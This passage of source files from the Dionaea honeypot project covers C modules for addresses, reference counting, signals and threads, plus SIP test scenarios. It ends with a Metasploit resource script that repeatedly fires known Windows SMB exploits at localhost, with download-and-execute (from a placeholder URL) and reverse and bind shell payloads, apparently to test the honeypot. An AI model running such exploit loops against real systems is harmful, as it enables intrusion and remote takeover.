node->dns.current_address ) 122 | return NULL; 123 | else 124 | return node->dns.resolved_addresses[node->dns.current_address++]; 125 | } 126 | 127 | void node_info_addr_clear(struct node_info *node) 128 | { 129 | int i; 130 | for( i=0;idns.resolved_address_count; i++ ) 131 | { 132 | g_free(node->dns.resolved_addresses[i]); 133 | } 134 | g_free(node->dns.resolved_addresses); 135 | node->dns.resolved_addresses = NULL; 136 | node->dns.resolved_address_count = 0; 137 | node->dns.current_address=0; 138 | if( node->hostname != NULL ) 139 | g_free(node->hostname); 140 | } 141 | 142 | char *node_info_get_ip_string(struct node_info *node) 143 | { 144 | return node->ip_string; 145 | } 146 | 147 | char *node_info_get_port_string(struct node_info *node) 148 | { 149 | return node->port_string; 150 | } 151 | 152 | void node_info_set_port(struct node_info *node, uint16_t port) 153 | { 154 | socklen_t sizeof_sa; 155 | node->port = htons(port); 156 | if( !parse_addr(node->ip_string, node->iface_scope, ntohs(node->port), &node->addr, &node->domain, &sizeof_sa) ) 157 | g_debug("error parsing new addr ..."); 158 | else 159 | { 160 | node_info_set(node, &node->addr); 161 | g_debug("new node info %s", node->node_string); 162 | } 163 | } 164 | 165 | void node_info_set_addr(struct node_info *node, char *addr) 166 | { 167 | socklen_t sizeof_sa; 168 | if( !parse_addr(addr, node->iface_scope, ntohs(node->port), &node->addr, &node->domain, &sizeof_sa) ) 169 | g_debug("error parsing new addr ..."); 170 | else 171 | { 172 | node_info_set(node, &node->addr); 173 | g_debug("new node info %s", node->node_string); 174 | } 175 | } 176 | -------------------------------------------------------------------------------- /src/refcount.c: -------------------------------------------------------------------------------- 1 | /******************************************************************************** 2 | * Dionaea 3 | * - catches bugs - 4 | * 5 | * 6 | * 7 | * Copyright (C) 2009 Paul Baecher & Markus Koetter 8 | * 9 | * This program is free software; you can redistribute it and/or 10 | * modify it under the terms of the GNU General Public License 11 | * as published by the Free Software Foundation; either version 2 12 | * of the License, or (at your option) any later version. 13 | * 14 | * This program is distributed in the hope that it will be useful, 15 | * but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | * GNU General Public License for more details. 18 | * 19 | * You should have received a copy of the GNU General Public License 20 | * along with this program; if not, write to the Free Software 21 | * Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. 22 | * 23 | * 24 | * contact nepenthesdev@gmail.com 25 | * 26 | *******************************************************************************/ 27 | 28 | 29 | #include "refcount.h" 30 | 31 | void refcount_init(struct refcount *rc) 32 | { 33 | rc->refs = 0; 34 | rc->mutex = g_mutex_new(); 35 | } 36 | 37 | void refcount_exit(struct refcount *rc) 38 | { 39 | g_mutex_free(rc->mutex); 40 | } 41 | 42 | void refcount_inc(struct refcount *rc) 43 | { 44 | g_mutex_lock(rc->mutex); 45 | rc->refs++; 46 | g_mutex_unlock(rc->mutex); 47 | } 48 | 49 | void refcount_dec(struct refcount *rc) 50 | { 51 | g_mutex_lock(rc->mutex); 52 | rc->refs--; 53 | g_mutex_unlock(rc->mutex); 54 | } 55 | 56 | bool refcount_is_zero(struct refcount *rc) 57 | { 58 | bool ret = false; 59 | 60 | g_mutex_lock(rc->mutex); 61 | if( rc->refs == 0 ) 62 | ret = true; 63 | g_mutex_unlock(rc->mutex); 64 | return ret; 65 | } 66 | 67 | -------------------------------------------------------------------------------- /src/signals.c: -------------------------------------------------------------------------------- 1 | /******************************************************************************** 2 | * Dionaea 3 | * - catches bugs - 4 | * 5 | * 6 | * 7 | * Copyright (C) 2009 Paul Baecher & Markus Koetter 8 | * 9 | * This program is free software; you can redistribute it and/or 10 | * modify it under the terms of the GNU General Public License 11 | * as published by the Free Software Foundation; either version 2 12 | * of the License, or (at your option) any later version. 13 | * 14 | * This program is distributed in the hope that it will be useful, 15 | * but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | * GNU General Public License for more details. 18 | * 19 | * You should have received a copy of the GNU General Public License 20 | * along with this program; if not, write to the Free Software 21 | * Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. 22 | * 23 | * 24 | * contact nepenthesdev@gmail.com 25 | * 26 | *******************************************************************************/ 27 | 28 | #include "config.h" 29 | #include 30 | #include 31 | #include 32 | #include 33 | #include 34 | #ifdef HAVE_EXECINFO_H 35 | #include 36 | #endif 37 | 38 | 39 | #include "dionaea.h" 40 | #include "signals.h" 41 | #include "modules.h" 42 | #include "log.h" 43 | 44 | #define D_LOG_DOMAIN "log" 45 | 46 | void sigint_cb(struct ev_loop *loop, struct ev_signal *w, int revents) 47 | { 48 | g_warning("%s loop %p w %p revents %i",__PRETTY_FUNCTION__, loop, w, revents); 49 | ev_break(loop, EVBREAK_ALL); 50 | } 51 | 52 | void sighup_cb(struct ev_loop *loop, struct ev_signal *w, int revents) 53 | { 54 | g_warning("%s loop %p w %p revents %i",__PRETTY_FUNCTION__, loop, w, revents); 55 | 56 | g_info("Reloading config"); 57 | if( (g_dionaea->config.config = lcfg_new(g_dionaea->config.name)) == NULL ) 58 | { 59 | g_critical("config not found"); 60 | } 61 | 62 | if( lcfg_parse(g_dionaea->config.config) != lcfg_status_ok ) 63 | { 64 | g_critical("lcfg error: %s\n", lcfg_error_get(g_dionaea->config.config)); 65 | } 66 | 67 | g_dionaea->config.root = lcfgx_tree_new(g_dionaea->config.config); 68 | 69 | 70 | // modules ... 71 | modules_hup(); 72 | 73 | // loggers hup 74 | for( GList *it = g_dionaea->logging->loggers; it != NULL; it = it->next ) 75 | { 76 | struct logger *l = it->data; 77 | g_message("Logger %p hup %p", l, l->log); 78 | if( l->hup != NULL ) 79 | l->hup(l, l->data); 80 | } 81 | } 82 | 83 | 84 | 85 | void sigsegv_cb(struct ev_loop *loop, struct ev_signal *w, int revents) 86 | //int segv_handler(int sig) 87 | { 88 | g_warning("%s loop %p w %p revents %i",__PRETTY_FUNCTION__, loop, w, revents); 89 | // g_warning("%s sig %i",__PRETTY_FUNCTION__, sig); 90 | char cmd[100]; 91 | char progname[100]; 92 | char *p; 93 | int n; 94 | 95 | n = readlink("/proc/self/exe", progname, sizeof(progname)); 96 | progname[n] = 0; 97 | 98 | p = strrchr(progname, '/'); 99 | *p = 0; 100 | 101 | snprintf(cmd, sizeof(cmd), "%s/bin/dionaea-backtrace %d > /tmp/segv_%s.%d.out 2>&1", 102 | PREFIX, (int)getpid(), p+1, (int)getpid()); 103 | if( system(cmd) ) 104 | return; 105 | signal(SIGSEGV, SIG_DFL); 106 | // return 0; 107 | } 108 | 109 | 110 | void sigsegv_backtrace_cb(int sig) 111 | { 112 | #ifdef HAVE_EXECINFO_H 113 | #define BACKTRACE_SIZE 32 114 | void *back[BACKTRACE_SIZE]; 115 | size_t size; 116 | 117 | size = backtrace( back, BACKTRACE_SIZE ); 118 | 119 | g_mutex_lock(g_dionaea->logging->lock); 120 | for( GList *it = g_dionaea->logging->loggers; it != NULL; it = it->next ) 121 | { 122 | struct logger *l = it->data; 123 | 124 | if( l->fd == -1 ) 125 | continue; 126 | 127 | if( l->flush != NULL ) 128 | l->flush(l, l->data); 129 | const char *msg = 130 | "\n" 131 | "This is the end.\n" 132 | "This software just had a segmentation fault.\n" 133 | "The bug you encountered may even be exploitable.\n" 134 | "If you want to assist in fixing the bug, please send the backtrace below to nepenthesdev@gmail.com.\n" 135 | "You can create better backtraces with gdb, for more information visit http://dionaea.carnivore.it/#segfault\n" 136 | "Once you read this message, your tty may be broken, simply type reset, so it will come to life again\n" 137 | "\n"; 138 | if( write(l->fd, msg, strlen(msg)) != strlen(msg)) 139 | continue; 140 | backtrace_symbols_fd(back, size, l->fd); 141 | } 142 | // g_mutex_unlock(g_dionaea->logging->lock); 143 | #endif 144 | exit(-1); 145 | } 146 | -------------------------------------------------------------------------------- /src/threads.c: -------------------------------------------------------------------------------- 1 | /******************************************************************************** 2 | * Dionaea 3 | * - catches bugs - 4 | * 5 | * 6 | * 7 | * Copyright (C) 2009 Paul Baecher & Markus Koetter 8 | * 9 | * This program is free software; you can redistribute it and/or 10 | * modify it under the terms of the GNU General Public License 11 | * as published by the Free Software Foundation; either version 2 12 | * of the License, or (at your option) any later version. 13 | * 14 | * This program is distributed in the hope that it will be useful, 15 | * but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | * GNU General Public License for more details. 18 | * 19 | * You should have received a copy of the GNU General Public License 20 | * along with this program; if not, write to the Free Software 21 | * Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. 22 | * 23 | * 24 | * contact nepenthesdev@gmail.com 25 | * 26 | *******************************************************************************/ 27 | 28 | #include 29 | #include 30 | #include 31 | #include 32 | 33 | 34 | #include "dionaea.h" 35 | #include "threads.h" 36 | #include "log.h" 37 | #include "incident.h" 38 | #include "connection.h" 39 | 40 | #define D_LOG_DOMAIN "thread" 41 | 42 | 43 | void threadpool_wrapper(gpointer data, gpointer user_data) 44 | { 45 | struct thread *t = data; 46 | #ifdef DEBUG 47 | GTimer *timer = g_timer_new(); 48 | #endif 49 | t->function(t->con, t->data); 50 | #ifdef DEBUG 51 | g_timer_stop(timer); 52 | g_debug("Thread fn %p con %p data %p took %f ms", t->function, t->con, t->data, g_timer_elapsed(timer, NULL)); 53 | g_timer_destroy(timer); 54 | #endif 55 | g_free(data); 56 | } 57 | 58 | void trigger_cb(struct ev_loop *loop, struct ev_async *w, int revents) 59 | { 60 | GAsyncQueue *aq = g_async_queue_ref(g_dionaea->threads->cmds); 61 | struct async_cmd *cmd; 62 | while( (cmd = g_async_queue_try_pop(aq)) != NULL ) 63 | { 64 | cmd->function(cmd->data); 65 | g_free(cmd); 66 | } 67 | g_async_queue_unref(aq); 68 | } 69 | 70 | void thread_test(gpointer a, gpointer b) 71 | { 72 | int s = rand()%10; 73 | g_debug("%p sleeping %i", g_thread_self(), s); 74 | sleep(s); 75 | g_debug("%p done", g_thread_self()); 76 | } 77 | 78 | void surveillance_cb(struct ev_loop *loop, struct ev_periodic *w, int revents) 79 | { 80 | /* g_debug("%s %i %i", 81 | __PRETTY_FUNCTION__, 82 | g_thread_pool_unprocessed(g_dionaea->threads->pool), 83 | g_thread_pool_get_max_threads(g_dionaea->threads->pool)); 84 | */ 85 | while( g_thread_pool_unprocessed(g_dionaea->threads->pool) > 86 | g_thread_pool_get_max_threads(g_dionaea->threads->pool) ) 87 | { 88 | g_critical("Threadpool is crowded %i/%i, suspending *all* activity", 89 | g_thread_pool_unprocessed(g_dionaea->threads->pool), 90 | g_thread_pool_get_max_threads(g_dionaea->threads->pool)); 91 | sleep(1); 92 | } 93 | } 94 | 95 | 96 | struct thread *thread_new(struct connection *con, void *data, GFunc function) 97 | { 98 | struct thread *t = g_malloc0(sizeof(struct thread)); 99 | t->con = con; 100 | t->data = data; 101 | t->function = function; 102 | return t; 103 | } 104 | 105 | 106 | struct async_cmd *async_cmd_new(async_cmd_cb function, void *data) 107 | { 108 | struct async_cmd *cmd = g_malloc0(sizeof(struct async_cmd)); 109 | cmd->data = data; 110 | cmd->function = function; 111 | return cmd; 112 | } 113 | 114 | void async_cmd_free(struct async_cmd *cmd) 115 | { 116 | g_free(cmd); 117 | } 118 | 119 | 120 | 121 | void async_incident_report(void *data) 122 | { 123 | struct incident *i = data; 124 | incident_report(i); 125 | struct connection *con; 126 | if( incident_value_con_get(i, "con", &con ) ) 127 | connection_unref(con); 128 | incident_free(i); 129 | } 130 | -------------------------------------------------------------------------------- /tests/sip/README: -------------------------------------------------------------------------------- 1 | How to run a test 2 | ================= 3 | 4 | You can run the tests manually and set all required values and paths. 5 | 6 | export TOOL_SMAP=/path/to/smap/smap 7 | export TOOL_SMAP_BASE=/path/to/smap/ 8 | export TOOL_SIPP=/path/to/sipp 9 | 10 | LHOST=10.0.0.1 RHOST=10.0.0.2 ./run-tests.sh run 11 | 12 | OR 13 | 14 | You can run the test using BackTrack 4 or 5. In this case all required paths are preconfigured. 15 | 16 | BackTrack 4: 17 | 18 | LHOST=10.0.0.1 RHOST=10.0.0.2 ./run-bt4.sh run 19 | 20 | BackTrack 5: 21 | 22 | LHOST=10.0.0.1 RHOST=10.0.0.2 ./run-bt5.sh run 23 | 24 | -------------------------------------------------------------------------------- /tests/sip/run-bt4.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # Set some environment vars for backtrack 4 3 | 4 | export TOOL_SMAP=/pentest/voip/smap/smap 5 | export TOOL_SMAP_BASE=/pentest/voip/smap 6 | 7 | ./run-tests.sh $@ 8 | -------------------------------------------------------------------------------- /tests/sip/run-bt5.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # Set some environment vars for backtrack 5 3 | 4 | export TOOL_SMAP=/pentest/voip/smap/smap 5 | export TOOL_SMAP_BASE=/pentest/voip/smap 6 | export TOOL_SIPP=/pentest/voip/sipp/sipp 7 | 8 | ./run-tests.sh $@ 9 | -------------------------------------------------------------------------------- /tests/sip/sipp/error_sdp.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | ;tag=[pid]SIPpTag00[call_number] 11 | To: sut 12 | Call-ID: [call_id] 13 | CSeq: 1 INVITE 14 | Contact: sip:sipp@[local_ip]:[local_port] 15 | Max-Forwards: 70 16 | Subject: Performance Test 17 | Content-Type: application/sdp 18 | Content-Length: [len] 19 | 20 | v=0 21 | o=user1 53655765 2353687637 IN IP[local_ip_type] [local_ip] 22 | s=- 23 | c=IN IP[media_ip_type] [media_ip] 24 | t= 25 | m=audio [media_port] RTP/AVP 0 26 | a=rtpmap:0 PCMU/8000 27 | ]]> 28 | 29 | 30 | 31 | 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | -------------------------------------------------------------------------------- /tests/sip/sipp/newmethod.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | ;tag=[call_number] 9 | To: 10 | Call-ID: [call_id] 11 | CSeq: [cseq] NEWMETHOD 12 | Contact: sip:sipp@[local_ip]:[local_port] 13 | Max-Forwards: 10 14 | User-Agent: SIPp/Linux 15 | Content-Length: 0 16 | Accept: text/plain 17 | ]]> 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | 29 | 30 | -------------------------------------------------------------------------------- /tests/sip/sipp/options.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | ;tag=[call_number] 9 | To: 10 | Call-ID: [call_id] 11 | CSeq: [cseq] OPTIONS 12 | Contact: sip:sipp@[local_ip]:[local_port] 13 | Max-Forwards: 10 14 | User-Agent: SIPp/Linux 15 | Content-Length: 0 16 | Accept: text/plain 17 | ]]> 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | 29 | 30 | -------------------------------------------------------------------------------- /tests/sip/sipp/register.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | ;tag=[call_number] 9 | To: 10 | Call-ID: [call_id] 11 | CSeq: [cseq] REGISTER 12 | Contact: sip:[field0]@[local_ip]:[local_port] 13 | Max-Forwards: 10 14 | Expires: 300 15 | User-Agent: SIPp/Linux 16 | Content-Length: 0 17 | ]]> 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | ;tag=[call_number] 30 | To: 31 | Call-ID: [call_id] 32 | CSeq: [cseq] REGISTER 33 | Contact: sip:[field0]@[local_ip]:[local_port] 34 | Max-Forwards: 10 35 | Expires: 0 36 | User-Agent: SIPp/Linux 37 | Content-Length: 0 38 | ]]> 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | 49 | 50 | 51 | -------------------------------------------------------------------------------- /tests/sip/sipp/register_pw.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | ;tag=[call_number] 9 | To: 10 | Call-ID: [call_id] 11 | CSeq: [cseq] REGISTER 12 | Contact: sip:[field0]@[local_ip]:[local_port] 13 | Max-Forwards: 10 14 | Expires: 300 15 | User-Agent: SIPp/Linux 16 | Content-Length: 0 17 | ]]> 18 | 19 | 20 | 21 | 22 | 23 | 24 | ;tag=[call_number] 28 | To: 29 | Call-ID: [call_id] 30 | CSeq: [cseq] REGISTER 31 | Contact: sip:[field0]@[local_ip]:[local_port] 32 | [field1] 33 | Max-Forwards: 10 34 | Expires: 300 35 | User-Agent: SIPp/Linux 36 | Content-Length: 0 37 | ]]> 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | ;tag=[call_number] 50 | To: 51 | Call-ID: [call_id] 52 | CSeq: [cseq] REGISTER 53 | Contact: sip:[field0]@[local_ip]:[local_port] 54 | Max-Forwards: 10 55 | Expires: 0 56 | User-Agent: SIPp/Linux 57 | Content-Length: 0 58 | ]]> 59 | 60 | 61 | 62 | 63 | 64 | 65 | ;tag=[call_number] 69 | To: 70 | Call-ID: [call_id] 71 | CSeq: [cseq] REGISTER 72 | Contact: sip:[field0]@[local_ip]:[local_port] 73 | [field1] 74 | Max-Forwards: 10 75 | Expires: 0 76 | User-Agent: SIPp/Linux 77 | Content-Length: 0 78 | ]]> 79 | 80 | 81 | 82 | 83 | 84 | 85 | 86 | 87 | 88 | 89 | 90 | 91 | -------------------------------------------------------------------------------- /tests/sip/sipp/uac.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | ;tag=[pid]SIPpTag00[call_number] 31 | To: sut 32 | Call-ID: [call_id] 33 | CSeq: 1 INVITE 34 | Contact: sip:sipp@[local_ip]:[local_port] 35 | Max-Forwards: 70 36 | Subject: Performance Test 37 | Content-Type: application/sdp 38 | Content-Length: [len] 39 | 40 | v=0 41 | o=user1 53655765 2353687637 IN IP[local_ip_type] [local_ip] 42 | s=- 43 | c=IN IP[media_ip_type] [media_ip] 44 | t=0 0 45 | m=audio [media_port] RTP/AVP 0 46 | a=rtpmap:0 PCMU/8000 47 | 48 | ]]> 49 | 50 | 51 | 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | ;tag=[pid]SIPpTag00[call_number] 75 | To: sut [peer_tag_param] 76 | Call-ID: [call_id] 77 | CSeq: 1 ACK 78 | Contact: sip:sipp@[local_ip]:[local_port] 79 | Max-Forwards: 70 80 | Subject: Performance Test 81 | Content-Length: 0 82 | 83 | ]]> 84 | 85 | 86 | 87 | 88 | 89 | 90 | 91 | 92 | ;tag=[pid]SIPpTag00[call_number] 97 | To: sut [peer_tag_param] 98 | Call-ID: [call_id] 99 | CSeq: 2 BYE 100 | Contact: sip:sipp@[local_ip]:[local_port] 101 | Max-Forwards: 70 102 | Subject: Performance Test 103 | Content-Length: 0 104 | 105 | ]]> 106 | 107 | 108 | 109 | 110 | 111 | 112 | 113 | 114 | 115 | 116 | 117 | 118 | 119 | -------------------------------------------------------------------------------- /tests/sip/sipp/user.csv: -------------------------------------------------------------------------------- 1 | SEQUENTIAL 2 | 100 3 | -------------------------------------------------------------------------------- /tests/sip/sipp/user_pw.csv: -------------------------------------------------------------------------------- 1 | SEQUENTIAL 2 | pw100;[authentication username=pw100 password=password] 3 | -------------------------------------------------------------------------------- /tests/smb/metasploit.rc: -------------------------------------------------------------------------------- 1 | version 2 | 3 | 4 | sleep(1) 5 | 6 | shellcodes = { 7 | 'download:exec' => { 8 | 'payload' => 'windows/download_exec', 9 | 'options' => { 10 | 'URL' => 'http://foobar.de/test.exe' 11 | } 12 | }, 13 | 'shell:reverse' => { 14 | 'payload' => 'windows/shell/reverse_tcp', 15 | 'options' => { 16 | 'LHOST' => '127.0.0.1', 17 | 'LPORT' => 4445 18 | } 19 | }, 20 | 21 | 'shell:bind' => { 22 | 'payload' => 'windows/shell/bind_tcp', 23 | 'options' => { 24 | 'LPORT' => 4444 25 | } 26 | }, 27 | 28 | 'exec' => { 29 | 'payload' => 'windows/exec', 30 | 'options' => { 31 | 'CMD' => 'echo foo' 32 | } 33 | } 34 | 35 | } 36 | 37 | exploits = { 38 | 'ms03-049' => { 39 | 'exploit' => 'exploit/windows/smb/ms03_049_netapi', 40 | 'shellcode' => { 41 | 'allow' => ['download:exec'] 42 | } 43 | }, 44 | 45 | 'ms04-007' => { 46 | 'exploit' => 'exploit/windows/smb/ms04_007_killbill', 47 | 'shellcode' => { 48 | 'allow' => ['download:exec'] 49 | } 50 | }, 51 | 52 | 'ms04-011' => { 53 | 'exploit' => 'exploit/windows/smb/ms04_011_lsass', 54 | 'shellcode' => { 55 | 'allow' => ['download:exec'] 56 | } 57 | }, 58 | 59 | 'ms04-031' => { 60 | 'exploit' => 'exploit/windows/smb/ms04_031_netdde', 61 | 'shellcode' => { 62 | 'allow' => ['download:exec'] 63 | } 64 | }, 65 | 66 | 'ms05-039' => { 67 | 'exploit' => 'exploit/windows/smb/ms05_039_pnp', 68 | 'shellcode' => { 69 | 'allow' => ['download:exec'] 70 | } 71 | }, 72 | 73 | # 'ms06-025' => { 74 | # 'exploit' => ['exploit/windows/smb/ms06_025_rasmans_reg','exploit/windows/smb/ms06_025_rasmans_rras'] 75 | # }, 76 | 77 | 'ms06-040' => { 78 | 'exploit' => 'exploit/windows/smb/ms06_040_netapi', 79 | 'shellcode' => { 80 | 'allow' => ['download:exec'] 81 | } 82 | }, 83 | 84 | # 'ms06-066' => { 85 | # 'exploit' => ['exploit/windows/smb/ms06_066_nwapi','exploit/windows/smb/ms06_066_nwwks'], 86 | # }, 87 | 88 | 'ms06-070' => { 89 | 'exploit' => 'exploit/windows/smb/ms06_070_wkssvc', 90 | 'shellcode' => { 91 | 'allow' => ['download:exec'] 92 | } 93 | }, 94 | 95 | 'ms07-029' => { 96 | 'exploit' => 'exploit/windows/smb/ms07_029_msdns_zonename', 97 | 'shellcode' => { 98 | 'allow' => ['download:exec'] 99 | } 100 | }, 101 | 102 | 'ms08-067' => { 103 | 'exploit' => 'exploit/windows/smb/ms08_067_netapi', 104 | 'shellcode' => { 105 | 'allow' => ['download:exec'] 106 | } 107 | }, 108 | 109 | 'ms09-050' => { 110 | 'exploit' => 'exploit/windows/smb/ms09_050_smb2_negotiate_func_index', 111 | 'options' => { 112 | 'WAIT' => 2 113 | }, 114 | 'shellcode' => { 115 | 'allow' => ['download:exec'] 116 | } 117 | }, 118 | 119 | 'ms10-061' => { 120 | 'exploit' => 'exploit/windows/smb/ms10_061_spoolss', 121 | 'options' => { 122 | 'PNAME' => 'XPSPrinter' 123 | } 124 | } 125 | } 126 | 127 | while (true) 128 | exploits.each { |xpk, xpv| 129 | 130 | print_status("Running #{xpk}") 131 | run_single("use #{xpv['exploit']}") 132 | run_single("set RHOST 127.0.0.1") 133 | 134 | if xpv.has_key?('options') then 135 | options = xpv['options'] 136 | options.each { |key,value| 137 | run_single("set #{key} #{value}") 138 | } 139 | end 140 | 141 | isallowed = true 142 | if xpv.has_key?('shellcode') then 143 | isallowed = false 144 | allow = xpv['shellcode']['allow'] 145 | else 146 | allow = [] 147 | end 148 | 149 | shellcodes.each { |sck, scv| 150 | allowed = isallowed 151 | allow.each { |a| 152 | if sck.match(/#{a}/) then 153 | allowed = true 154 | if xpv['shellcode'].has_key?('deny') then 155 | deny = xpv['shellcode']['deny'] 156 | deny.each { |d| 157 | # print_status("deny #{sck} #{d}") 158 | if sck.match(/#{d}/) then 159 | allowed = false 160 | break 161 | end 162 | } 163 | end 164 | break 165 | end 166 | } 167 | if not allowed then 168 | next 169 | end 170 | 171 | run_single("set PAYLOAD #{scv['payload']}") 172 | options = scv['options'] 173 | options.each { |key,value| 174 | run_single("set #{key} #{value}") 175 | } 176 | sleep(1) 177 | print_status("Exploit #{xpk} Payload #{scv['payload']}") 178 | run_single("exploit") 179 | } 180 | } 181 | 182 | end 183 | 184 | --------------------------------------------------------------------------------